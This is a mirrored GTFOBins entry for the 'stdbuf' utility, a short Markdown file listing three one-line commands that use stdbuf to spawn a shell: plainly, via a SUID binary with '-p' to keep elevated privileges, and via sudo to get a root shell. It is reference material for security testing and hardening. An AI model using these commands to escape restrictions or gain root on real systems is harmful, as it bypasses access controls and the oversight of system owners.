mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
10 lines
177 B
Markdown
10 lines
177 B
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: stdbuf -i0 /bin/sh
|
|
suid-enabled:
|
|
- code: ./stdbuf -i0 /bin/sh -p
|
|
sudo-enabled:
|
|
- code: sudo stdbuf -i0 /bin/sh
|
|
---
|